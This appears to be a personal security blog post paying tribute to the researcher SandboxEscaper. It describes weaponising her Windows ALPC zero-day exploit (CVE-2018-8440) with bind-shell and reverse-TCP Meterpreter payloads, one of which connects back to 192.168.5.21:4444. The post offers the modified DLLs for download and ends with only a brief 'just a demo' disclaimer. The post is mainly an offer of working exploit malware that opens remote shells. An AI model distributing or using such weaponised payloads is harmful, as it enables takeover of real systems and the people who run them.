SandboxEscaper Windows 0-Day Exploit payload Weaponised: Tribute
I am an experienced Vulnerability Researcher and Security Architect with 16+ years of experience in various verticals and horizontals, be it consumer electronics, semiconductors, automotive or other. Having started in software engineer in low-level embedded devices from writing applications to kernel drivers on various operating systems and then moving to my real calling i.e. hacking. Love to stick to the older golden days of game hacking, BBS, shareware, phreaking, phrack, virus era, metal music, cheats and many more such cool stuff from the underground. I wear many hats from time to time as necessary - but I also love to help people and organizations to deal with the core cybersecurity issues and not provide them a checklist with a presentation. Opinions and posts on my site are purely my own and do not reflect my work.
This is a tribute post to a researcher named “sandboxescaper” – who used to find zero days for breakfast in Windows – PE was her expertise and much more. I heard she went to work for MS after dropping tons of zero days on Windows some 5-6 years ago. I was quite fascinated an intrigued by her. She was mentioned in quite a few articles and new posts at the time – here is one such example here – so at the time I decided to weaponise one of her exploits to do: CVE-2018-8440
A bindshell
And a Reverse TCP
Bind Shell Payload Modification
Reverse TCP Payload Modification
Run Exploit as shown in original video or for weaponization from my video downloaded from this gdrive.
The existing ALPC DLL is modified with weaponized payload located here ->>> Weaponized Dll’s
Reverse TCP (192.168.5.21:4444 connects back from victim to our meterpreter)
Bind TCP Shell (4444 on victim)
Weaponised DLL’s
sandboxescaper-zeroday-demo-with-weaponized-payloadDownload
This is just a demo. Do not really weaponize in real world.
